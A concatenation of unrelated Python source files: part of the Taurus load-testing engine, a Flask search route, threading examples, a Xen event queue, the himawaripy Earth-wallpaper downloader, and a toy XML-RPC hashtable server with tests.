self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self._http_client = None
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": bzt.VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions: # type: BetterDict
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
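# The result looks like e.g. "linux-9a1b2c3d4e5f": the prefix plus uuid.getnode() rendered as hex.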
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work: call prepare() on Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
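# dehumanize_time() converts humanized durations to seconds, e.g. "30s" -> 30.0, "2m" -> 120.0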
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait for modules to finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add existing artifact, it will be collected into artifact_dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file not exists: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = get_full_path(self.artifacts_dir)
self.log.info("Artifacts dir: %s", self.artifacts_dir)
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
        dump = self.create_artifact("effective", "")  # TODO: not ideal, since this file does not exist yet
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
        Try to find a file or dir in the search path, if one was specified. Helps find files
        in non-CLI environments or relative to the config path.
        The returned path is absolute and doesn't need further abspath/normpath treatment.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
configs = []
try:
sys.path.insert(0, os.path.curdir) # necessary for development mode (running bzt from curdir)
configs.extend(self._scan_system_configs())
configs.extend(self._scan_package_configs())
finally:
sys.path.pop(0)
configs.sort(key=os.path.basename)
self.log.debug("Base configs list: %s", configs)
if not configs:
self.log.warning("No base configs were discovered")
self.config.load(configs)
def _scan_package_configs(self):
configs = []
for importer, modname, ispkg in pkgutil.iter_modules(path=None):
try:
if not ispkg:
continue
package_path = getattr(importer, 'path', None)
if package_path is None:
continue
index_path = os.path.join(package_path, modname, 'bzt-configs.json')
if not os.path.exists(index_path):
continue
try:
with codecs.open(index_path, 'rb', encoding='utf-8') as fds:
index_configs = json.load(fds)
except (OSError, IOError, ValueError) as exc:
self.log.debug("Can't load package-specific bzt config %s: %s", index_path, exc)
continue
if not isinstance(index_configs, list):
                    self.log.debug("Error: value of bzt-configs.json should be a list (%s)", index_path)
continue
for config_name in index_configs:
                    configs.append(os.path.join(package_path, modname, config_name))
except BaseException as exc:
self.log.warning("Can't look for package configs in package %r: %s", modname, str(exc))
self.log.debug("Traceback: %s", traceback.format_exc())
return configs
def _scan_system_configs(self):
configs = []
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading system configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
configs.append(fname)
return configs
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
                msg = "Module '%s' can only be used once, will merge all new instances into one"
                self.log.warning(msg, mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
return False
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (bzt.VERSION, install_id)
addr = "https://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(bzt.VERSION)
latest = LooseVersion(data['latest'])
if mine < latest or data['needsUpgrade']:
                msg = "There is a newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
for varname in envs:
if envs[varname]:
envs[varname] = str(envs[varname])
envs[varname] = os.path.expandvars(envs[varname])
for varname in envs:
if envs[varname] is None:
if varname in os.environ:
os.environ.pop(varname)
else:
os.environ[varname] = str(envs[varname])
def custom_expandvars(value):
parts = re.split(r'(\$\{.*?\})', value)
value = ''
for item in parts:
if item and item.startswith("${") and item.endswith("}"):
key = item[2:-1]
if key in envs:
item = envs[key]
if item is not None:
value += text_type(item)
return value
def apply_env(value, key, container):
if isinstance(value, string_types):
container[key] = custom_expandvars(value)
BetterDict.traverse(self.config, apply_env)
|
search.py
|
from flask import request
from flask import jsonify
from flask_cors import cross_origin
import threading
from .sem_search import SemSearch
def load_in_background(nlp, app, stops_path):
ss = SemSearch(stops_path)
app.logger.info("🔋 sem_search ready")
nlp.set('search', ss)
def add_search(app, nlp, stops_path):
thread = threading.Thread(
target=load_in_background, args=(nlp, app, stops_path))
# thread.start()
nlp.queue('search', thread)
@app.route('/api/search', methods=['GET'])
@cross_origin()
def search(): # pylint: disable=unused-variable
ss = nlp.get('search', check_ready=True)
# maybe add a default to get (risky because of no exclude sources)
query = request.args.get('q', default="")
results = ss.predict_slugs(query) # return a vector directly
return jsonify(results)
|
thread_example_with_io.py
|
# -*- coding: utf-8 -*-
'''
j.philipson
9:32 PM, 1/27/2021
'''
import threading
#ref: https://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
# Plain threads do not hand their return value back, so collect it in a shared list.
result = []
def addMyNumbers(a, b):
    result.append(a + b)
    return a + b
x = threading.Thread(target=addMyNumbers, args=(1, 2))
x.start()
x.join()
print(result[0])  # prints 3, the value computed in the worker thread
print('done and sunny')
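# A hedged alternative sketch (an addition, not from the original note): the standard
# library's concurrent.futures API hands the worker's return value back directly,
# which is usually simpler than sharing a list between threads as done above.
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(max_workers=1) as pool:
    future = pool.submit(addMyNumbers, 1, 2)  # schedule the call on a worker thread
    print(future.result())                    # blocks until the worker returns; prints 3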
|
event_queue.py
|
import copy
import queue
from collections import OrderedDict
from threading import Thread
from connman import ReDBConnection
from loggable import Loggable
from tornado.options import options as opts
from xenadapter import XenAdapterPool
from xenadapter.event_dispatcher import EVENT_DISPATCHER
import json
from datetimeencoder import DateTimeEncoder
def print_event(event):
ordered = OrderedDict(event)
ordered.move_to_end("operation", last=False)
ordered.move_to_end("class", last=False)
return ordered
class EventQueue(queue.Queue, Loggable):
def __init__(self, authenticator, db, num_workers=16):
super().__init__()
super().init_log()
self.db = db
        self.authenticator = authenticator
self.log.debug(f"Processing Xen events using {num_workers} workers")
self.log.debug(f"Event dispatcher configuration: {EVENT_DISPATCHER}")
for i in range(num_workers):
t = Thread(target=self.process_events, args=[copy.copy(self.authenticator)])
t.daemon = True
t.start()
def __repr__(self):
return 'EventQueue'
def process_events(self, authenticator):
with ReDBConnection().get_connection():
authenticator.xen = XenAdapterPool().get()
while True:
event = self.get()
if event['class'] == 'message':
self.task_done()
                    continue  # temporary hardcode to speed up event handling
log_this = opts.log_events and event['class'] in opts.log_events.split(',') \
or not opts.log_events
                if event['class'] not in EVENT_DISPATCHER:
if log_this:
self.log.debug(
f"Ignored Event: {json.dumps(print_event(event), cls=DateTimeEncoder)}")
self.task_done()
continue
if log_this:
self.log.debug(f"Event: {json.dumps(print_event(event), cls=DateTimeEncoder)}")
for ev_class in EVENT_DISPATCHER[event['class']]:
try:
ev_class.process_event(authenticator, event, self.db, self.authenticator.__name__)
except Exception as e:
self.log.error(f"Failed to process event by {ev_class.__name__}: {e}")
self.task_done()
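# Minimal, dependency-free sketch (an illustrative addition, not part of the original
# module), relying only on the `queue` and `Thread` imports above: the same pattern
# EventQueue uses -- a queue.Queue subclass that spawns daemon workers which pull items
# off the queue and mark them done.
if __name__ == '__main__':
    class DemoQueue(queue.Queue):
        def __init__(self, num_workers=4):
            super().__init__()
            for _ in range(num_workers):
                Thread(target=self._work, daemon=True).start()
        def _work(self):
            while True:
                item = self.get()          # blocks until an item is available
                print('processed', item)   # real code would dispatch the event here
                self.task_done()           # lets join() know this item is finished
    demo = DemoQueue()
    for i in range(10):
        demo.put(i)
    demo.join()  # returns once every queued item has been marked done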
|
__main__.py
|
#!/usr/bin/env python3
import argparse
import io
import itertools as it
import json
import multiprocessing as mp
import multiprocessing.dummy as mp_dummy
import os
import os.path as path
import subprocess
import sys
import threading
import time
import urllib.request
from datetime import timedelta, datetime
from glob import iglob, glob
from time import strptime, strftime, mktime
from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.triggers.interval import IntervalTrigger
from apscheduler.triggers.cron import CronTrigger
import appdirs
from PIL import Image
from dateutil.tz import tzlocal
from utils import set_background, get_desktop_environment
# Semantic Versioning: Major, Minor, Patch
HIMAWARIPY_VERSION = (2, 0, 1)
counter = None
HEIGHT = 550
WIDTH = 550
LATEST_JSON = ''
def calculate_time_offset(latest_date, auto, preferred_offset):
if auto:
preferred_offset = int(datetime.now(tzlocal()).strftime("%z")[0:3])
print("Detected offset: UTC{:+03d}:00".format(preferred_offset))
if 11 >= preferred_offset > 10:
preferred_offset = 10
print("Offset is greater than +10, +10 will be used...")
elif 12 >= preferred_offset > 11:
preferred_offset = -12
        print("Offset is greater than +11, -12 will be used...")
himawari_offset = 10 # UTC+10:00 is the time zone that himawari is over
offset = int(preferred_offset - himawari_offset)
offset_tmp = datetime.fromtimestamp(mktime(latest_date)) + timedelta(hours=offset)
offset_time = offset_tmp.timetuple()
return offset_time
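# Worked example of the offset arithmetic above (illustrative comment, not original code):
# for a user at UTC+02:00, offset = 2 - 10 = -8, so the requested tile time is the latest
# Himawari timestamp shifted back by 8 hours; offsets in (+10, +11] are clamped to +10 and
# offsets in (+11, +12] wrap around to -12 before the subtraction.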
def download_chunk(args):
global counter
x, y, latest, level = args
url_format = "http://himawari8.nict.go.jp/img/D531106/{}d/{}/{}_{}_{}.png"
url = url_format.format(level, WIDTH, strftime("%Y/%m/%d/%H%M%S", latest), x, y)
tiledata = download(url)
# If the tile data is 2867 bytes, it is a blank "No Image" tile.
if tiledata.__sizeof__() == 2867:
print('No image available for {}.'.format(strftime("%Y/%m/%d %H:%M:%S", latest)))
os._exit(3)
with counter.get_lock():
counter.value += 1
if counter.value == level * level:
print("Downloading tiles: completed.")
else:
print("Downloading tiles: {}/{} completed...".format(counter.value, level * level))
return x, y, tiledata
def parse_args():
parser = argparse.ArgumentParser(description="set (near-realtime) picture of Earth as your desktop background",
epilog="http://labs.boramalper.org/himawaripy")
parser.add_argument("--version", action="version", version="%(prog)s {}.{}.{}".format(*HIMAWARIPY_VERSION))
group = parser.add_mutually_exclusive_group()
group.add_argument("--auto-offset", action="store_true", dest="auto_offset", default=False,
help="determine offset automatically")
group.add_argument("-o", "--offset", type=int, dest="offset", default=10,
help="UTC time offset in hours, must be less than or equal to +10")
parser.add_argument("-l", "--level", type=int, choices=[4, 8, 16, 20], dest="level", default=4,
help="increases the quality (and the size) of each tile. possible values are 4, 8, 16, 20")
parser.add_argument("-d", "--deadline", type=int, dest="deadline", default=6,
help="deadline in minutes to download all the tiles, set 0 to cancel")
parser.add_argument("--save-battery", action="store_true", dest="save_battery", default=False,
help="stop refreshing on battery")
default_output_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'wallpaper')
parser.add_argument("--output-dir", type=str, dest="output_dir",
help="directory to save the temporary background image",
default=default_output_dir)
args = parser.parse_args()
if not -12 <= args.offset <= 10:
sys.exit("OFFSET has to be between -12 and +10!\n")
if not args.deadline >= 0:
sys.exit("DEADLINE has to be greater than (or equal to if you want to disable) zero!\n")
return args
def is_discharging():
if sys.platform.startswith("linux"):
if len(glob("/sys/class/power_supply/BAT*")) > 1:
print("Multiple batteries detected, using BAT0.")
with open("/sys/class/power_supply/BAT0/status") as f:
status = f.readline().strip()
return status == "Discharging"
elif sys.platform == 'darwin':
return b'discharging' in subprocess.check_output(["pmset", "-g", "batt"])
else:
sys.exit("Battery saving feature works only on linux or mac!\n")
def download(url):
exception = None
for i in range(1, 4): # retry max 3 times
try:
with urllib.request.urlopen(url) as response:
return response.read()
except Exception as e:
exception = e
print("[{}/3] Retrying to download '{}'...".format(i, url))
time.sleep(1)
pass
if exception:
raise exception
else:
sys.exit("Could not download '{}'!\n".format(url))
def thread_main(args):
global counter
global LATEST_JSON
counter = mp.Value("i", 0)
level = args.level # since we are going to use it a lot of times
print("Updating...")
latest_json = download("http://himawari8-dl.nict.go.jp/himawari8/img/D531106/latest.json")
latest = strptime(json.loads(latest_json.decode("utf-8"))["date"], "%Y-%m-%d %H:%M:%S")
print("Latest version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", latest)))
if latest_json == LATEST_JSON:
print('Skip...')
return
LATEST_JSON = latest_json
requested_time = calculate_time_offset(latest, args.auto_offset, args.offset)
if args.auto_offset or args.offset != 10:
print("Offset version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", requested_time)))
png = Image.new("RGB", (WIDTH * level, HEIGHT * level))
p = mp_dummy.Pool(level * level)
print("Downloading tiles...")
res = p.map(download_chunk, it.product(range(level), range(level), (requested_time,), (args.level,)))
for (x, y, tiledata) in res:
tile = Image.open(io.BytesIO(tiledata))
png.paste(tile, (WIDTH * x, HEIGHT * y, WIDTH * (x + 1), HEIGHT * (y + 1)))
for file in iglob(path.join(args.output_dir, "himawari-*.png")):
os.remove(file)
output_file = path.join(args.output_dir, strftime("himawari-%Y%m%dT%H%M%S.png", requested_time))
print("Saving to '%s'..." % (output_file,))
os.makedirs(path.dirname(output_file), exist_ok=True)
png.save(output_file, "PNG")
if sys.platform == 'win32':
return
if not set_background(output_file):
sys.exit("Your desktop environment '{}' is not supported!\n".format(get_desktop_environment()))
def main():
args = parse_args()
print("himawaripy {}.{}.{}".format(*HIMAWARIPY_VERSION))
if args.save_battery and is_discharging():
sys.exit("Discharging!\n")
main_thread = threading.Thread(target=thread_main, args=(args,), name="himawaripy-main-thread", daemon=True)
main_thread.start()
main_thread.join(args.deadline * 60 if args.deadline else None)
if args.deadline and main_thread.is_alive():
sys.exit("Timeout!\n")
def run():
scheduler = BlockingScheduler()
scheduler.add_job(main, trigger=IntervalTrigger(minutes=1), next_run_time=datetime.now())
try:
scheduler.start()
except KeyboardInterrupt:
sys.exit('Quit!\n')
if __name__ == "__main__":
run()
|
metaserver.py
|
#!/usr/bin/env python
import sys, SimpleXMLRPCServer, getopt, pickle, time, threading, xmlrpclib, unittest
from datetime import datetime, timedelta
from xmlrpclib import Binary
# Presents a HT interface
class SimpleHT:
def __init__(self):
self.data = {}
def count(self):
return len(self.data)
# Retrieve something from the HT
def get(self, key):
# return value
if key not in self.data:
return -1
return self.data[key]
# Insert something into the HT
def put(self, key, value):
# Remove expired entries
self.data[key] = value
return True
# Load contents from a file
def read_file(self, filename):
f = open(filename.data, "rb")
self.data = pickle.load(f)
f.close()
return True
# Write contents to a file
def write_file(self, filename):
f = open(filename.data, "wb")
pickle.dump(self.data, f)
f.close()
return True
# Print the contents of the hashtable
def print_content(self):
print self.data
return True
def pop_entry(self,key):
return self.data.pop(key)
def get_keys(self):
return self.data.keys()
def main():
optlist, args = getopt.getopt(sys.argv[1:], "", ["port=", "test"])
ol={}
for k,v in optlist:
ol[k] = v
port = 51234
if "--port" in ol:
port = int(ol["--port"])
if "--test" in ol:
sys.argv.remove("--test")
unittest.main()
return
serve(port)
# Start the xmlrpc server
def serve(port):
file_server = SimpleXMLRPCServer.SimpleXMLRPCServer(("localhost", port))
file_server.register_introspection_functions()
sht = SimpleHT()
file_server.register_function(sht.get)
file_server.register_function(sht.put)
file_server.register_function(sht.print_content)
file_server.register_function(sht.read_file)
file_server.register_function(sht.write_file)
file_server.register_function(sht.pop_entry)
file_server.register_function(sht.get_keys)
file_server.serve_forever()
# Execute the xmlrpc in a thread ... needed for testing
class serve_thread:
def __call__(self, port):
serve(port)
# Wrapper functions so the tests don't need to be concerned about Binary blobs
class Helper:
def __init__(self, caller):
self.caller = caller
def put(self, key, val, ttl):
return self.caller.put(Binary(key), Binary(val), ttl)
def get(self, key):
return self.caller.get(Binary(key))
def write_file(self, filename):
return self.caller.write_file(Binary(filename))
def read_file(self, filename):
return self.caller.read_file(Binary(filename))
class SimpleHTTest(unittest.TestCase):
def test_direct(self):
helper = Helper(SimpleHT())
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
self.assertTrue(helper.put("test", "test", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test", "Failed to perform single get")
self.assertTrue(helper.put("test", "test0", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test0", "Failed to perform overwrite")
self.assertTrue(helper.put("test", "test1", 2), "Failed to put" )
self.assertEqual(helper.get("test")["value"], "test1", "Failed to perform overwrite")
time.sleep(2)
self.assertEqual(helper.get("test"), {}, "Failed expire")
self.assertTrue(helper.put("test", "test2", 20000))
self.assertEqual(helper.get("test")["value"], "test2", "Store new value")
helper.write_file("test")
helper = Helper(SimpleHT())
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
helper.read_file("test")
self.assertEqual(helper.get("test")["value"], "test2", "Load unsuccessful!")
self.assertTrue(helper.put("some_other_key", "some_value", 10000))
self.assertEqual(helper.get("some_other_key")["value"], "some_value", "Different keys")
self.assertEqual(helper.get("test")["value"], "test2", "Verify contents")
# Test via RPC
def test_xmlrpc(self):
output_thread = threading.Thread(target=serve_thread(), args=(51234, ))
output_thread.setDaemon(True)
output_thread.start()
time.sleep(1)
helper = Helper(xmlrpclib.Server("http://127.0.0.1:51234"))
self.assertEqual(helper.get("test"), {}, "DHT isn't empty")
self.assertTrue(helper.put("test", "test", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test", "Failed to perform single get")
self.assertTrue(helper.put("test", "test0", 10000), "Failed to put")
self.assertEqual(helper.get("test")["value"], "test0", "Failed to perform overwrite")
self.assertTrue(helper.put("test", "test1", 2), "Failed to put" )
self.assertEqual(helper.get("test")["value"], "test1", "Failed to perform overwrite")
time.sleep(2)
self.assertEqual(helper.get("test"), {}, "Failed expire")
self.assertTrue(helper.put("test", "test2", 20000))
self.assertEqual(helper.get("test")["value"], "test2", "Store new value")
if __name__ == "__main__":
main()
|
LocalDispatcher.py
|
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
